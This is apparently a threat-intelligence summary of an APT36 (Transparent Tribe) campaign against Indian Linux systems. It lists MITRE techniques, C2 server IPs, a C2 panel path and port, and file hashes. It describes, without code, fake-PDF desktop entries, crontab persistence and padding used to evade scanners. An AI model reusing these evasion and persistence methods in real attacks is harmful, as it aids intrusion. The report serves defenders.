CYFIRMA traces the infrastructure tied to the Transparent Tribe (APT36), uncovering Mythic C2 servers and Poseidon binaries used against targets in India. The report highlights Linux-based attack vectors, persistence tricks, and the evolving threat landscape around this group. #TransparentTribe #Poseidon
Keypoints
- The investigation tracks Transparent Tribe (APT36) infrastructure and identifies related C2 servers hosted on DigitalOcean.
- A Twitter tip pointed to two IPs linked to Transparent Tribe’s C2 servers, part of Mythic’s C2 infrastructure.
- JARM fingerprinting narrowed from about 31,390 servers to 15 hosts tied to Mythic-based activity, potentially targeting India.
- Malicious Linux desktop entry files disguised as PDFs are used to deploy payloads and establish persistence.
- APT36 is increasingly targeting Linux environments, including Debian-based OSs in Indian government sectors (BOSS OS, Maya OS).
- The report provides insights into infrastructure, methods, and tools used by APT36 in a Linux-based attack campaign targeting India.
MITRE Techniques
- [T1566] Phishing – Used to deliver malicious payloads via phishing emails or malicious websites. Quote: “Possibly the zip archive (Document Details.zip …) containing malicious Linux desktop entry file (Document Details.pdf.desktop …) is distributed either through phishing emails or malicious websites.”
- [T1059] User Execution – Malicious file and command scripts are executed when the Linux desktop entry runs. Quote: “The Linux desktop entry file is crafted to look like a legitimate PDF document link but actually performs a series of malicious actions upon execution.”
- [T1547] Boot or Logon Autostart Execution – Persistence via scheduling mechanisms. Quote: “manipulates the crontab (a Linux scheduling tool) to ensure persistence.”
- [T1027] Obfuscated Files or Information – Obfuscation to evade detection. Quote: “The Linux desktop entry file size exceeds 1 MB due to the addition of numerous “#” characters, likely an attempt to evade security scans.”
- [T1564.001] Hide Artifacts: Hidden Files and Directories – Use of a hidden directory for payloads. Quote: “creates a hidden directory (~/.local/share) on the system where it downloads two malicious files.”
- [T1070.004] Indicator Removal: File Deletion – Attempt to clean up traces. Quote: “Finally, the file attempts to clean up traces of its presence by removing temporary files.”
- [T1071.001] Application Layer Protocol: Web Protocols – C2 panel accessed over web protocols on port 7443. Quote: “The C2 panel for Mythic Poseidon is accessible via the URI path /new/login on these server IPs at port 7443.”
Indicators of Compromise
- [IP] C2-Malicious Infrastructure – 143.198.64.151, 165.232.118.207, and 14 more IPs
- [MD5 Hash] Poseidon binaries – 242f77b4e65671a55e103b8b26df46a7, 9d0f1c7825a207a2ad4acd0c9fece794, and 7 more hashes
- [File Name] Linux Desktop Entry File – Document Details.pdf.desktop (md5: e354cf4cc4177e019ad236f8b241ba3c)
- [MD5 Hash] Zip Archive – Document Details.zip (md5: 01d9e52a4b38beb6541c5d3cae265a26)